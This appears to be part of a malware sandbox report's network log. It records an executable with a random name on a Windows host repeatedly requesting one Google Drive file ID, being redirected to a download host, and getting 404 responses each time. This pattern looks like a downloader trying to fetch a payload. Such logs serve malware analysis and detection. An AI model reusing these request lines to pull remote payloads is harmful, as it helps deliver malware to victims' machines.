                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC43XaxlFqyVA6M2XyBvZI-18sVr_4K1WPuRpYXcq1cXD0RwaWHXuAYjpcX2gJDjHaAlK1l-bT25HA
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:05:50 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9-kbIblUbJdJRc4HOEvyuA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        32 | 192.168.11.20 | 49783 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:06:00 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:06:00 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:06:00 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-P05a5V4imh20DSs_LXNUXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        33 | 192.168.11.20 | 49784 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:06:00 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:06:01 UTC | 1854 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:06:01 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-i-HzHjzfENGb9z2j9QZMjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC61E3qxaDeVNEsvXIHsiQHj78gIg4qxQweaHiarS-ubhhtCQEztpuSFvLjHQ_zrlX-yfpyB81GxRA
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:06:01 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Aikc2BgiIygyq_QSndoW-g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        34 | 192.168.11.20 | 49785 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:06:11 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:06:11 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:06:11 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-DSvISPtS6latOKg2ancO0w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        35 | 192.168.11.20 | 49786 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:06:12 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:06:12 UTC | 1847 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:06:12 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-T30503VURgHNMWOuDA9ZmQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC4XmtXROYDrJAf5wxMMa53vWiWT9Fc0J9pfjHiSgmtxM8-oGbAnr9zHDWE238S6tlEP-0k
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:06:12 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NZShdhnE7geZGI3rAvvdHg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        36 | 192.168.11.20 | 49787 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:06:22 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:06:23 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:06:22 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-pDVxYskwXpJg6ePKjPSI7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        37 | 192.168.11.20 | 49788 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:06:23 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:06:23 UTC | 1847 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:06:23 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-EUGawtJepS0rmDvgeaVD2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC5p3TfNqwhLQDGbtA9TdF8symRv-IxCZ_boh5nDwpUbP7zmyM6AdUoYnhwb75WzVYl6Q84
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:06:23 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8d7uO-WmQZB3okzMGhulxg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        38 | 192.168.11.20 | 49789 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:06:33 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:06:34 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:06:34 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-bAz5xG0g6tgiliw55bLdMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        39 | 192.168.11.20 | 49790 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:06:34 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:06:34 UTC | 1854 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:06:34 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-kRnWbVoZtDj_hH9UADMkqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC5tl8ZQ-ipRAcWHtwDeHNhqTXV9OGaIma6ipvk_pbjlNoVraoZKjAQ_YAJcMuZF7fgy0nlJx2ZmJg
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:06:34 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Fba-KRSNI8B_s9dc4U43Vg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        40 | 192.168.11.20 | 49791 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:06:45 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:06:45 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:06:45 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-MUWtL1jWKrzIdUSj9Of8tg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
